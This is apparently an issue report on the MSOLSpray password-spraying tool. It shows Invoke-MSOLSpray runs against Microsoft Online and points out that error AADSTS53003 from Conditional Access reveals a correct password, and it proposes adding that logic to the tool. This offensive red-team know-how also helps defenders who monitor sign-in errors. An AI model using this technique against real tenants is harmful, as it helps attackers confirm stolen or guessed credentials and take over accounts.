Add additional code indicating Password was fine, but Conditional Access Policy thwarted attempt

[mgeeky]

Hi,

During our tests we've found, that when sprayed User with a correct password - attempt failed due to Conditional Access Policy requirements, following error code will be thrown:

PS C:\MSOLSpray > Invoke-MSOLSpray -UserList users.txt -password Winter2022 -verbose
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 02/11/2022 14:06:36
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload
[*] Got an error we haven't seen yet for user john.doe@contoso.com
{"error":"interaction_required","error_description":"AADSTS53003: Access has been blocked by Conditional Access policies. The access policy does not allow
token issuance.\r\nTrace ID: e0ea6353-40e5-4496-8bd5-294facea2e00\r\nCorrelation ID: 2ba27739-7daf-49e7-949c-2e16e3c42079\r\nTimestamp: 2022-02-11
13:06:36Z","error_codes":[53003],"timestamp":"2022-02-11 13:06:36Z","trace_id":"e0ea6353-40e5-4496-8bd5-294facea2e00","correlation_id":"2ba27739-7daf-49e7-9
49c-2e16e3c42079","error_uri":"[https://login.microsoft.com/error?code=53003","suberror":"message_only"}](https://login.microsoft.com/error?code=53003%22,%22suberror%22:%22message_only%22%7D)

Whereas the same attempt with a wrong password will result in no output:

PS C:\MSOLSpray > Invoke-MSOLSpray -UserList users.txt -password Winter20www22 -verbose
[*] There are 1 total users to spray.
[*] Now spraying Microsoft Online.
[*] Current date and time: 02/11/2022 14:06:51
VERBOSE: POST https://login.microsoft.com/common/oauth2/token with -1-byte payload

The conclusion is that AADSTS53003 error code indicates correct password, but CAP getting into way.
I guess it's worth adding corresponding logic to handle that :)

Regards,
Mariusz.